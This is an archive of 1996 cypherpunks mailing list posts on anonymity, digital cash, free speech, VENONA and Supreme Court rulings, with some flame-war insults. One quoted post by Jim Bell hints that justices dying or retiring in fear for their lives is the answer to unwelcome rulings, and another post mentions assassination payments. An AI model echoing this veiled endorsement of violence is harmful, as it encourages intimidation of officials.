Content-Type: text/plain


At 09:18 PM 3/14/96 -0600, Jim Thompson wrote:
>
>(Alan Olsen forwards something of the FringeWare list to cypherpunks.)
>
>> Something of interest...
>>
>> >X-Www-Page: http://www.fringeware.com/MSG/index.html#digest
>> >Keywords: pleashes heorg horizona disabili freques inspecurs
>> >Subject: SCHWA - New Web Search Engine!!
>
>Oh sweet Jesus in the morning, it was a JOKE!

Yes.  And your point...?

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 15 Mar 1996 14:56:04 +0800
To: cypherpunks@toad.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <ad6e18d20f0210040753@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


First, let me say I sympathize with the "problems of anonymity" that Hal
has had to deal with. He began running his remailers about as early as
anyone, so he clearly has had to encounter problems that to most of us are
merely academic issues.

However, the problems anyone has with "anonymity" or "cash" are universal
ones. The real issue is this: should the problems and opportunities for
mischief that sometimes come up with anonymity or cash be grounds for
outlawing anonymity and cash?

At 6:18 PM 3/14/96, Hal wrote:

>As a remailer operator I unfortunately see more of the seamy side of
>anonymity than most people.  I do think there are people who will take
>advantage of this technology in harmful ways.  So payee anonymity will
>certainly make life more interesting.

I view things pretty simply. Often I am faced with choosing to deal with
people on a fully or mostly anonymous basis, and I am faced with dealing
with people who offer cash. I can choose to deal with these people or their
payments, or not. I can demand further identification, insiste that they
pay with more traceable forms of payment, such as personal checks, or not.

Yes, there is a chance of abuse. Even of criminality.

But I strongly prefer making the choice myself, rather than having a
government decide for me.

Fully anonymous digital cash--which I believe has been implicit in Chaum's
system since the gitgo, as soon as anonymous money-changers are
extant--will certainly make possible certain behaviors variously regarded
as "crimes." As Hal of course knows, these potential crimes have been
debated by us many times. (One of them, most recently, is Bell's version of
untraceable assassination payments.)

But of course the same sorts of problems are implicit in anonymous cash
transactions, in anonymous mail sending (note that letters have stamps,
with no requirement of identification, at least not yet), and in the very
presence of immediately-negotiable currency.

I of course agree with Eric Hughes' point that we should not be attempting
to "sanitize" the possibilities. (One of the depressing things for me has
been the extent to which so many subscribers to this list think that the
main agenda is some sort of discussion of PGP 3.0 or of IETF standards, or
even of Java applets, without any real awareness of the longterm
implications. And when people ask about political implications, there are
even mother hens who demand "What does this have to do with crypto?"
Depressing.)

As to not sanitizing, look again at the .sig I have used in more-or-less
the same form for several years.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Thompson" <jim@SmallWorks.COM>
Date: Sat, 16 Mar 1996 18:36:26 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: SCHWA - New Web Search Engine!!
In-Reply-To: <2.2.32.19960314230647.0089dfc0@mail.teleport.com>
Message-ID: <9603142118.ZM6979@butthead.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



(Alan Olsen forwards something of the FringeWare list to cypherpunks.)

> Something of interest...
>
> >X-Www-Page: http://www.fringeware.com/MSG/index.html#digest
> >Keywords: pleashes heorg horizona disabili freques inspecurs
> >Subject: SCHWA - New Web Search Engine!!

Oh sweet Jesus in the morning, it was a JOKE!

Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Mar 1996 18:39:56 +0800
To: cypherpunks@toad.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <ad6e2a32100210041c3b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 AM 3/15/96, Bill Frantz wrote:

>Mark Miller and I had a discussion about the restrictions on commercial
>speech a few months ago.  I contended that these restrictions (generally
>that you can prove your claims) are good for markets because they provide
>startup companies (and other newcomers to the market) with a small amount
>of positive reputation capital that they would otherwise have to invest to
>obtain.

Mr. Frantz, unless you can prove your claims here, forthwith, I must inform
you that they are in violation of the Truth in Speech Act of 1996. Please
retract them, now.

(Yoy can of course find the complete description of how citizen-units
ascertain the veracity of their claims at their local Ministry of Truth
office. Minitru is always to help citizen-units on their quest for truth.)


Do you see the problem?

Personally, I don't care if you choose to have some bunch of people called
the "Food and Drug Administration" telling you which substances you may
buy, and in which quantities, but I care greatly that you (the general you)
wish to stop me from making my own decisions, or listening to those I
choose to trust, over the FDA.

This is what it all boils down to. Think about it.

Be careful of the utilitarian point of view that the "FDA saves lives." (It
has also cost a lot of lives, by denying effective treatments for needless
years of extra butt-covering tests just so no bureacrat will ever have even
a single Flipper-kid on his watch.)

Mexico has no FDA. A trip to the pharmacies of Tijuana is instructive. A
friend of mine was just here. On a business trip to SF and LA, he drove all
the way down to TJ to buy a "personal supply" of a nootropic drug for his
mildly-retarded son, a drug the FDA has not approved but which Mexicans and
Europeans have been buying for years. U.S. Customs, aware of such
tragedies, waves people through who are carrying "personal supplies" of
(non-narcotic) drugs.

We should learn from this kind of "anarchy" the Mexicans enjoy.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Fri, 15 Mar 1996 14:01:28 +0800
To: cypherpunks@toad.com
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <199603142054.VAA04403@kampai.euronet.nl>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 PM 3/13/96 -0500, Alan Horowitz wrote:
>Visual contrast is not the same thing as frequency diffrence. It is quite
>easy to measure extremely small changes of phase.  As in, your
>plain-vanilla FM receiver.

However, that's not how SVGA CRT's do it.  NTSC (TV video) modulation is done by phase modulation of the 3.579545 MHz subcarrier.  SVGA has three different baseband analog signals feeding three electron beams.

Even so, they still should be able to pick up SVGA with a little tinkering.

kkkkk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 15 Mar 1996 15:45:49 +0800
To: Yawn82@aol.com
Subject: Stupid
Message-ID: <199603150426.XAA08875@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 14 Mar 96 at 19:30, Yawn82@aol.com wrote:

> How the hell do I get off this list?

Very carefully.

 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 16 Mar 1996 22:36:50 +0800
To: cypherpunks@toad.com
Subject: Re: Venona NSA web page
Message-ID: <199603150730.XAA26212@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM 3/14/96 -0800, Vladimir Z. Nuri wrote:
>------- Forwarded Message
>
>Date:      Wed, 13 Mar 1996 06:59:32 -0500 (EST)
>From: merkaba@styx.ios.com
>Subject:   VENONA PROJECT (fwd)
>
>
>
>
>- - ---------- Forwarded message ----------
>Date: Tue, 12 Mar 1996 22:07:24 -0500
>From: Ronald Pearce <ronald@cybercomm.net>
>To: merkaba@styx.ios.com
>Subject: VENONA PROJECT
>
>http://www.nsa.gov:8080/docs/venona/venona.html
>
>The VENONA Project
>
>In July 1995 the Intelligence Community ended a 50-year silence regarding
>one of cryptology's most splendid successes - the VENONA Project. ...

How they did it (from http://www.nsa.gov:8080/docs/venona/memory.html):

A word about the VENONA cryptosystems---they should have been impossible to
read. They consisted of a code book in which letters, words, and phrases
were equated to numbers. So a code clerk would take a plain text message
and encode the message using numbers from the codebook. This would have
presented a significant challenge itself depending on how long the code
book was used. However, the messages were further modified, in other words
double-encrypted, by use of a one time pad. The use of a one time pad
effectively randomizes the code and renders it unreadable. The key to the
VENONA success was that mistakes were made in the construction and use of
the one time pads---a fact that was discovered only through brute force and
analysis of the message traffic. 

(http://www.nsa.gov:8080/docs/venona/monographs/monograph-2.html):

... One-time pads used properly only once are unbreakable; however, the
KGB's cryptographic material manufacturing center in the Soviet Union
apparently reused some of the pages from one-time pads. This provided
Arlington Hall with an opening. Very few of the 1942 KGB messages were able
to be solved because there was very little duplication of one-time pad
pages in those messages. The situation was more favorable in 1943, even
more so in 1944, and the success rate improved accordingly.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corey@hedgehog.mcom.com (Corey Bridges)
Date: Sun, 17 Mar 1996 16:44:24 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks reference in Netscape book
Message-ID: <2.2.32.19960315083753.009c3b84@pdmail2.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm writing the "Encryption and SSL" chapter for the Netscape products, and
I'm finishing it up with a "Further reading" section that lists
crypto-related books, web sites, and newsgroups. I was thinking of including
a reference to this mailing list.

Any strong opinions either way?

As I see it, the downside is a possible increase in confused people
(specifically on the mailing list--not in general from my writing) and a
decrease in the ever-controversial signal-to-noise ratio. The upside is that
new people might come to the list and be enlightened further on the
reasonableness of privacy.

And speaking pragmatically, I can't imagine that too many people would take
the time to: 
        1.  read the docs
        2.  join the mailing list
        3.  post ill-considered messages

(As a side note, if anyone ever has any feedback about security coverage in
Netscape documentation, send it my way.)

Corey Bridges
Netscape Security Documentation
http://home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: firebrd123@ns.interconnect.net (Firebrd123)
Date: Fri, 15 Mar 1996 16:44:15 +0800
To: cypherpunks@toad.com
Subject: maling list
In-Reply-To: <Pine.SV4.3.91.960313223844.19338E-100000@larry.infi.net>
Message-ID: <3148BEF7.5E23@mail.interconnect.net>
MIME-Version: 1.0
Content-Type: text/plain


Can you please take me off your mailing list.  Thankyou.
firebrd123@mail.interconnect.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Mar 1996 22:37:06 +0800
To: cypherpunks@toad.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <ad6e59bb120210044720@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 AM 3/15/96, Bill Frantz wrote:
>At  9:26 PM 3/14/96 -0800, Timothy C. May wrote:
>>Mr. Frantz, unless you can prove your claims here, forthwith, I must inform
>>you that they are in violation of the Truth in Speech Act of 1996. Please
>>retract them, now.
>
>Political speech, not commercial speech.  The act doesn't apply or is
>unconstitutional.

I recognize no such distinction, and neither does--in my reading--the First
Amendment. The First doesn't say, "Congress shall make no law...except for
commercial speech...and except for religious speech...and except for
insulting speech...." It said, simply, "Congress shall make no law..."

(Before Bill jumps in and points out that he said nothing about religious,
insulting, etc. forms of speech, I added those because it underscores just
what "Congress shall make no law" means.)

The issue of _fraudulent claims_ is presumably a main reason for those who
think commercial speech is "different" from ordinary speech. Fraud is tough
to control through legislation without severely limiting free speech. For
example, if a Jehovah's Witness comes to my door and tells me all the
wonderful things that will happen if I convert, is this fraud? Before one
says this is "noncommercial," more fortunes have been lost or given away to
Moonies, Christians, and other cults than all the financial scams in
history. If a recruit to the Unification Church "is led to believe" that
she will find salvation in the bosom of the Church if she donates her
inheritance, is this fraud?

Personally, while I view all religions as basically fraudulent, liberal
societies have accepted the view that it's best that the State not seek to
determine which claims are true, that "caveat emptor" should be the rule.

The same caveat emptor view is the basic rationale for the First Amendment.
It is recognized that free speech will inevitably cause some people to make
bad decisions, to make bad investments (such as in the canonical case of an
investment advisor giving advice that turns out to be flaky), and so on.
"Don't believe everything you hear" is the operative phrase.

Again, I see no distinction between commercial and other forms of speech.
If a contract is involved, then civil law is the way to handle this. (As it
might be with religious speech, where someone is told contractually that if
they give $10,000 to the church their blindness will be cured. Key to a
contract must be a testable set of results.)


The First is under constant attack by people who claim that some type of
speech is "not covered" by the First, or that other clauses of the
Constitution give the State authority to regulate speech, or that the
Founders did not "intend" for certain types of speech to be protected. The
"campaign reformers" want limits placed on how much speech a candidate may
issue (or how much speech people like me, as a volunteer or PAC, can
issue). The medical protectionists want the speech of quacks, midwives, and
other non-union members suppressed. And the arguments about "commercial
speech" could mean broad limits on speech.


>>Do you see the problem?
>
>Of course.  Why do you think I said (in the 4th paragraph which you didn't
>quote) (ZING :-) ):

Touche.

>BTW - I consider non-free markets, produced primarily by oligarchic
>combines of large organizations to be a major impediment to removing
>government influence from the economic system.  Easing market entry is one
>way to reduce the power of these oligarchic combines.  I don't want to just
>trade elected government oppression for unelected corporate oppression.  To
>put it bluntly, to suppress the 19th century coal mining strikes, the
>companies hired the Pinkertons.  I don't see a whole lot of difference
>between this kind of private enterprise transaction, and Ruby Ridge.

But this is direct violence. Libertarians don't condone this. Using
episodes of such violence, by any side, as an argument against free markets
is just an appeal to emotion.

(I'm of course not saying we will ever be free of people initiating the use
of force.)

As for "oligarchic combines," certainly much larger and more concentrated
examples may be found in Microsoft and Intel, which currently have about
80% apiece of their respective markets. Not to many Pinkerton guards
forcing we Mac users to switch to Microsoft and Intel....


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 16 Mar 1996 22:33:58 +0800
To: firebrd123@ns.interconnect.net
Subject: Re: maling list
Message-ID: <2.2.32.19960314195041.006aace4@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 03/15/96 +0000, you wrote:
>Can you please take me off your mailing list.  Thankyou.
>firebrd123@mail.interconnect.net

We can take you off the maling list, or we can take you off the mailing list. Which would you prefer?

Of course, you'll still be on our shitlist....

Dave Merriman
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 16 Mar 1996 22:31:12 +0800
To: firebrd123@ns.interconnect.net
Subject: Re: maling list
In-Reply-To: <3148BEF7.5E23@mail.interconnect.net>
Message-ID: <199603150751.CAA11348@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Firebrd123 writes:
> Can you please take me off your mailing list.  Thankyou.
> firebrd123@mail.interconnect.net

No, we can't take you off the list. We are the *recipients* of the
mailing list, not the people who run it. We have no access to the
machine that contains the list management software. You get off by
mailing to the same address you mailed to to get on. I leave that
information as an exercise to the reader.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 16 Mar 1996 18:08:58 +0800
To: cypherpunks@toad.com
Subject: Re: Why escrow? (was Re: How would Leahy bill affect crypto
Message-ID: <960315042941_351869030@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-15 02:56:56 EST, Jim Bell cites Deranged Mutant:

>And if you recall the requirements the government wanted to put on 
>telephones equipped with Clipper, one thing they eventually admitted was 
>that they were insisting that such phones be designed to be inoperable with 
>a telephone that had its "key-escrow" not "enabled".  And they still wanted
>to 
>call it "voluntary!  That's a laugh!
>
>
>>Of course that depends how you give your key to an escrow agent. If 
>>it's already escrowed when you buy a phone, for instance...
>
>That's the real danger with any such legislation.  Individuals can generally

>only get things that are manufactured for sale.  (You can't buy a car with a

>7-cylinder engine, for instance...)  If manufacturers are dissuaded from 
>building a good crypto telephone, then key-escrow can be as "voluntary" as 
>you want and you still won't be able to exercise your rights. 

Of course, you could always hack up a direct-dial version of PGPfone or
Nautilus to turn your multimedia computer into a crypto phone...

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sat, 16 Mar 1996 18:07:15 +0800
To: cypherpunks@toad.com
Subject: RTFM & such
Message-ID: <960315042954_351869058@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-15 03:14:52 EST, you write:

>At 07:30 PM 3/14/96 -0500, Yawn82@aol.com wrote:
>>How the hell do I get off this list?
>
>You can check out any time you want, but you can never leave.
>
>
I seem to recall getting a message explaining how to do this when I
subscribed.

Jonathan Wienke

"Let's flame these bozos! They're too stupid to live!"
--Dr. Ziploc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 16 Mar 1996 18:12:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: RICO and remailers (brief treatment, if long)
In-Reply-To: <m0txRGg-00091GC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960315045110.6871C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Mar 1996, jim bell wrote:

> At 07:30 PM 3/13/96 -0500, Black Unicorn wrote:
> >0
> >Several people expressed interest in a small treatment of seizure law 
> >jurisprudence, and the Bennis case (seizure of an automobile used for 
> >soliciting prostitution was upheld even where one of the owners knew 
> >nothing about its use for a crime and which Mr. Bell has relied on 
> >fairly heavily in pointing out that the Supreme Court has its "head 
> >up its ass.")
> 
> "Relied on"?  Hell no!  Not when I get the following text, from an anonymous 
> source.  

Uh, I'm not sure what this sentence means.

> Begin quotation:
> 
> 
> So he wants a cite of Supreme Court decisions from you bearing on  
> legislative history & congressional intent, does he?

When it can be directly applied to your opinion that the Bennis case has 
anything to do with remailers, sure.

> 
> I've attatched the relevant syllabus <summary> which is from the  
> Supreme Court reporter & carries no legal weight, along with the  
> UNANIMOUS decision in Neal written by Kennedy.

[Whining about how a supreme court decision upholding the use of acid 
measurements including the weight of blotter paper as a guide to 
sentencing was really unfair deleted.]

> congressmen. The more Supreme Cocksucker decisions I read like this,  
> the better BOTH your big ideas sound.

Actually, the decision was in line with a long history of precident.  
That fact that you personally don't like the result has little to do with 
the legitimacy of the decision, or its fairness under law and the 
constitution.
 
> This & all recent other decisions of the 9 in-Justices are available at  
> the below address. 
> http://spoke.law.cornell.edu:8001/supct/opinionlist.1995.html
> 
> Syllabus:

> SUPREME COURT OF THE UNITED STATES
> 
> Syllabus
> 
> NEAL v. UNITED STATES
> certiorari to the united states court of appeals for the seventh circuit
> No. 94-9088.   Argued December 4, 1995-Decided January 22, 1996

[...]

> My commentary continues below: JB.
> 
> Note the sentence above,
> 
> "It is the responsibility of Congress, not this Court, to change statutes 
> that are thought to be unwise or unfair."  

Precisely.  This is called the seperation of powers.  It is the 
responsibility of the judicary to apply and intrepret the law, not make it.

> As far as I am aware, there is no _legal_ mechanism, short of impeachment 
> (but how practical is that?), to remove a sitting SC justice, no matter how 
> damaging his effect on the country by his decisions.  Thus, I propose 
> re-writing the above sentence a bit:

Actually, if a decision is so damaging, congress is always free to change 
it.  The major whine you and your anonymous friend have [i.e. that the 
Supreme court refused to apply the change in sentencing measurement of 
weight for LSD convictions] is entirely out of place.  If you took the 
time to look at the retroactivity issue, you would know that it was not 
applied retroactively because congress did not indicate that it should 
have been, (which congress was quite free to do, and has done before).  
Retroactivity in relation to a change in law by the legislature is NOT 
within the ambit of the court.  Congress simply refused to apply the 
sentencing changes retroactively.  If the court had done so, it would be 
making law.  This is not the function of the court.

Further, what the hell does any of this have to do with your former 
moronic claim that the Bennis case impacted remailers?  The claim that 
this is a statuatory construction case is rather far fetched.  It's a 
basic seperation of powers case, and it was decided correctly.

> "It is the responsibility of the citizenry, not Congress, to 'change' 
> Supreme Court Justices that are thought to be unwise or unfair."

Unfortunately, subjecting the supreme court to the short term whims of 
political fad would be devestating.  Making supreme court justices into 
elected officials is about the stupidist thing I've ever heard.  I won't 
even go into the kind of decisions you might get if this horridly 
reckless idea were implemented.

> 
> Since that change can be accomplished if that 'Justice' dies or becomes 
> disabled, (or retires, perhaps because he's in fear for his life) I think 
> the answer to boneheaded decisions like the Bennis one is obvious.
>
I think you need to crawl back under the rock from whence you came.

Really you and your anonymous friend have said nothing.  You don't like a 
pair of supreme court decisions, the basic premises and reasonings of which 
you couldn't recite if someone held a gun to your head and insisted.

I suggest you try and break the ego-centric pre-school mentality you 
have.  An eternity with satan himself and all of his devilish 
instruments of torture would be a walk in the park compared to five 
minutes in a dictatorship under you and anonymous.

> Jim Bell
> jimbell@pacifier.com
          ^^^^^^^^

Like I said.  Pre-school.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 16 Mar 1996 18:11:37 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [Noise] Re: RICO and remailers
In-Reply-To: <m0txRGg-00091GC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960315051316.6871E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



You know, the more I read, the more I understand why the United States is 
a declining power.  The education in this country must really be slipping.

On Thu, 14 Mar 1996, jim bell wrote:

> Begin quotation:
> 
> 
> So he wants a cite of Supreme Court decisions from you bearing on  
> legislative history & congressional intent, does he?

[...]

> to about 8.5 years FLAT time in the joint.  The original  
> absurdity was challenged in Chapman but the SC blindly stuck to it's  
> own reading of "mixture or substance", blindly ignoring reality &  
> Congressional intent that "cuts" of drugs such as heroin or cocaine  
> being an attempt to increase the amount sold & therefore profit, should  
> be punished, while the LSD paper was merely a way to transport &  
> distribute it. As far as congressional intent goes, Joseph Biden has  
> said that as chairman of the senate judiciary committee, they gave  
> little thought to LSD but they definitely did NOT mean weigh the whole  
> blotter paper in handing out nickels & dimes.

Who cares what the chairman of the committee who forwarded the bill 
thought?  He is but one member who voted or declined to vote for the 
bill.

The view that he has any more authority than any other member who 
supported the bill is a silly one.  Indeed, he may have had LSD out of 
mind when he wrote the bill, but unless you poll every member of congress 
as to their understanding of the bill, this means little if anything at all.

If a bill passes that says "All discharging of firearms within the 
District of Columbia is illegal."  Who cares if the chairman of the 
judiciary says (after the fact incidently) that he didn't think of 
handguns when he wrote the bill.  Obviously congress has passed an 
ambigious statute.  They could very easily have clarified the statute and 
applied the correction retroactively.  This they did not do, (despite the 
fact that they have often done so before, and that the court often 
invites congress to revisit an issue and make a correction, and congress 
often does).

> Now the US Sentencing  
> Commission has changed the guidelines by changing the way the dosage is  
> calculated to something reasonable, the SC refuses to make the change  
> retroactive to help a lot of people.

You mean, help a lot of convicted drug felons.  And even if they are 
deserving of help (I personally could care if people use drugs as long as 
they don't operate heavy machinery in public areas thereafter) where is 
the congress leaping to the rescue and writing an amendment to apply a 
corrective act retroactively?  (Which, incidently, is arguably beyond the 
power of the supreme court to do).  One might also note that the district 
court and the circut court came to the same conclusion in reading the 
intent of the statute.  You think those judges had their heads up their 
asses too?  You're talking now about 15 people who all came to the same 
conclusion.  Who's wrong?  These Harvard, Yale, Columbia, Georgetown and 
Stanford educated legal professionals, or you?

> Note where Kennedy basically says  
> that if Congress passees laws that are poorly worded & subject to  
> create great unfairness in sentences, the SC, once they've made a  
> stupid decision in interpretation will stick to it no matter how unfair  
> it is in order to make congress write laws that are linguistically  
> intelligible.

And you think that instead we should have two legislative branches second 
guessing one another?  What the hell is the law supposed to be if 
congress can't write it properly?  And if the manner of its application 
offends congress so much why has it not been corrected retroactively?  
Kennedy in this respect is acting as one of the more rational justices.  It 
is the activist justices that go crazy and stretch the law beyond the 
bounds of its intent.

Sure, it's easy enough to appeal to the libertarian in everyone by citing 
a supposedly silly result in a drug case, but you are fighting with smoke 
and mirrors here.  The real issue is one of seperation of powers.

It never ceases to amaze me how smart "commentators" like this think they 
are when they makes grand denouncements of the system.  It never ceases 
to amaze me that almost every single one of these "commentators" knows so 
little about the way the system really works that it's a wonder they 
passed the constitution test in 8th grade.  (Was it required when you 
were in school?  Probably not).

The more they talk, the more they prove my point.

A little knowledge is a dangerous thing.

A little legal knowledge is lethal.

> This would be fine if those on the sharp end of them were  
> congressmen. The more Supreme Cocksucker decisions I read like this,  
> the better BOTH your big ideas sound.

So move to a civil law jurisdiction.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 16 Mar 1996 02:16:25 +0800
To: cypherpunks@toad.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <199603151625.IAA21520@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
>>Mr. Frantz, unless you can prove your claims here, forthwith, I must inform
>>you that they are in violation of the Truth in Speech Act of 1996. Please
>>retract them, now.

Bill Frantz wrote:
>Political speech, not commercial speech.  The act doesn't apply or is
>unconstitutional.

I see:  The bill of rights reads: 
"Congress shall make no law [...] abridging the freedom of *political*
speech".   
Never knew that until now. 
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 15 Mar 1996 23:14:54 +0800
To: cypherpunks@toad.com
Subject: Re: maling list
Message-ID: <v02120d19ad6f2ea18fc5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:50 PM 3/14/96, David K. Merriman wrote:

> We can take you off the maling list, or we can take you off the mailing
>list. Which would you prefer?

Ah. And all this time I thought that cypherpunks was a mauling list.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@atropos.c2.org
Date: Sat, 16 Mar 1996 03:35:46 +0800
To: corey@hedgehog.mcom.com (Corey Bridges)
Subject: Re: Cypherpunks reference in Netscape book
In-Reply-To: <2.2.32.19960315083753.009c3b84@pdmail2.mcom.com>
Message-ID: <199603151744.JAA05865@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Make sure you list majordomo@toad.com and
cypherpunks-request@toad.com. Don't list cypherpunks@toad.com.

> I'm writing the "Encryption and SSL" chapter for the Netscape products, and
> I'm finishing it up with a "Further reading" section that lists
> crypto-related books, web sites, and newsgroups. I was thinking of including
> a reference to this mailing list.
> 
> Any strong opinions either way?
> 
> As I see it, the downside is a possible increase in confused people
> (specifically on the mailing list--not in general from my writing) and a
> decrease in the ever-controversial signal-to-noise ratio. The upside is that
> new people might come to the list and be enlightened further on the
> reasonableness of privacy.
> 
> And speaking pragmatically, I can't imagine that too many people would take
> the time to: 
>         1.  read the docs
>         2.  join the mailing list
>         3.  post ill-considered messages
> 
> (As a side note, if anyone ever has any feedback about security coverage in
> Netscape documentation, send it my way.)
> 
> Corey Bridges
> Netscape Security Documentation
> http://home.netscape.com/people/corey
> 415-528-2978
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Sat, 16 Mar 1996 01:47:54 +0800
To: cypherpunks@toad.com
Subject: [NOISE] The all.net controversy continues
Message-ID: <Pine.SCO.3.91.960315101330.22528A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's some info from all.net and a host of players IRT the "telnet" 
fiasco and assorted activities related to it.

Crypto relevance is oblique, but some people on this list have implied 
"knob twidling" intentions.  It would appear any number of sites are 
trying more than twidling.

